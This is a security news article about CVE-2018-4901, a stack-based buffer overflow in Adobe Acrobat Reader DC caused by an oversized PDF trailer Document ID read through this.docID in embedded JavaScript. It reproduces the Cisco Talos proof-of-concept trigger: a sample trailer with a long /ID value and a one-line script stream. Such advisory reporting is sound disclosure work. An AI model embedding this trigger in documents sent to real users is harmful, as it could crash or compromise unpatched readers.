Friday, January 31, 2025
Follow us On Linkedin
HomeCVE/vulnerabilityAdobe Acrobat Reader DC Affected with Critical Remote Code Execution Vulnerability -...

Adobe Acrobat Reader DC Affected with Critical Remote Code Execution Vulnerability – Its Time to Update

CVE/vulnerability

Published on

By Balaji
Adobe Acrobat Reader DC Affected with Critical Remote Code Execution Vulnerability – Its Time to Update

Free Webinar DevSecOps Hacks

SIEM as a Service

Follow Us on Google News

A Critical Remote Code Execution vulnerability discovered in Adobe Acrobat Reader DC that will perform a stack-based buffer overflow and execute the orbitary code when users opening the vulnerable Adobe document.

This Critical RCE vulnerability affected the version of Adobe Acrobat Reader DC 2018.009.20044 and Below.

Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs.

In this case, an attacker will send the specific crafted malicious document via email or, tricking a user into visiting a malicious web page and make user execute the malicious document and trigger this vulnerability.

Also Read:  Hackers Illegally Purchasing Abused Code-signing & SSL Certificates From Underground Market

Remote Code Execution Working Flow

Adobe Acrobat Reader DC application supports the embedded javascript within the Adobe document and allows it to work as PDF form.

This could be easily abused by an attacker using the vulnerability and using it for an additional attack surface.

According to Aleksandar Nikolic of  Cisco Talos, When parsing a PDF file with overly large Document ID field specified in the trailer, it is parsed correctly initially, but when it’s referenced in javascript, a stack-based buffer overflow can occur when encoding the bytes to a hex string.

A sample document ID:

trailer <<
  /Root 1 0 R
  /ID   <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA><a>
>>

In this case, Cisco Providing a simple javascript to trigger this critical Remote code execution vulnerability.

41 0 obj <<
>>
stream
    this.docID;
endstream
endobj

“the specified part of document ID field is hex-decoded into a sequence of bytes. When a this.docID is dereferenced in javascript, this byte sequence is encoded back into an ascii hex string again function at EScript+0x9e7c0

This vulnerability has been reported to Adobe and patch has been made and released an update on 2018 -02-13 with  CVE-2018-4901.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

CVE/vulnerability

Critical D-Link Router Flaw Allows Attackers to Take Full Remote Control

A critical unauthenticated Remote Code Execution (RCE) vulnerability has been identified in D-Link's DSL-3788...
Cyber Security News

Massive Hacking Forum Network Dismantled by Authorities, Impacting 10M Users

Authorities have delivered a major blow to the cybercrime world by dismantling two of...
Cyber Security News

Microsoft Enhances M365 Bounty Program with New Services & Rewards Up to $27,000

Microsoft has announced updates to its Microsoft 365 (M365) Bug Bounty Program, offering expanded...
Cyber Security News

Tata Technologies Hit by Ransomware Attack, Some IT Services Suspended

Tata Technologies, a leading provider of engineering and IT services, has reported a ransomware...

API Security Webinar

Free Webinar - DevSecOps Hacks

By embedding security into your CI/CD workflows, you can shift left, streamline your DevSecOps processes, and release secure applications faster—all while saving time and resources.

In this webinar, join Phani Deepak Akella ( VP of Marketing ) and Karthik Krishnamoorthy (CTO), Indusface as they explores best practices for integrating application security into your CI/CD workflows using tools like Jenkins and Jira.

Discussion points

Automate security scans as part of the CI/CD pipeline.
Get real-time, actionable insights into vulnerabilities.
Prioritize and track fixes directly in Jira, enhancing collaboration.
Reduce risks and costs by addressing vulnerabilities pre-production.

Register Now

More like this

CVE/vulnerability

Critical D-Link Router Flaw Allows Attackers to Take Full Remote Control

A critical unauthenticated Remote Code Execution (RCE) vulnerability has been identified in D-Link's DSL-3788...
CVE/vulnerability

CISA Releases Seven ICS Advisories to Strengthen Cybersecurity Posture

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued seven Industrial Control Systems...
CVE/vulnerability

TeamViewer Clients Vulnerability Leads to Privilege Escalation

TeamViewer, a widely used remote access software, has announced a critical vulnerability in its...

GBHackers on Security is a top cybersecurity news platform, delivering up-to-date coverage on breaches, emerging threats, malware, vulnerabilities, and global cyber incidents.

Company

Trending

Categories

Copyright @ 2016 - 2024 GBHackers On Security - All Rights Reserved